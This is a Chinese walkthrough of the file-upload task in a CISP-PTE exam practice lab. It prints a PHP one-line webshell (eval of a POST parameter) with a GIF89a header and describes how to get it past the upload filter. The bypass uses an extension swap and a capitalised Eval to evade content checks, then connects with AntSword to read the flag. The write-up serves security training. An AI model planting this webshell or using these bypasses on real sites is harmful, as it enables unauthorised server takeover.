本文主要是介绍CISP-PTE认证考试之文件上传,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
靶场获取
hunter搜索:body=“cisp-pte 认证考试” 获取免费靶场
CISP-PTE认证考试-文件上传
尝试任意文件上传php一句话
提示图片上传失败,首先想到利用图片马获取shell
制作图片马
可以制作图片马,或者修改文件头GIF89a。
图片马测试成功,这里尝试GIF89a头绕过。
给一句话木马文件修改为如下
GIF89a
<?php @eval($_POST['1']);?>
php木马文件后缀改为png
上传图片马
注意把文件后缀改回php
注意把eval函数改为Eval用于内容检测绕过
成功上传并访问
发现木马已解析
蚁剑连接webshell
获取flag
flag文件存在于/var/www/html/key.cisp
这篇关于CISP-PTE认证考试之文件上传的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
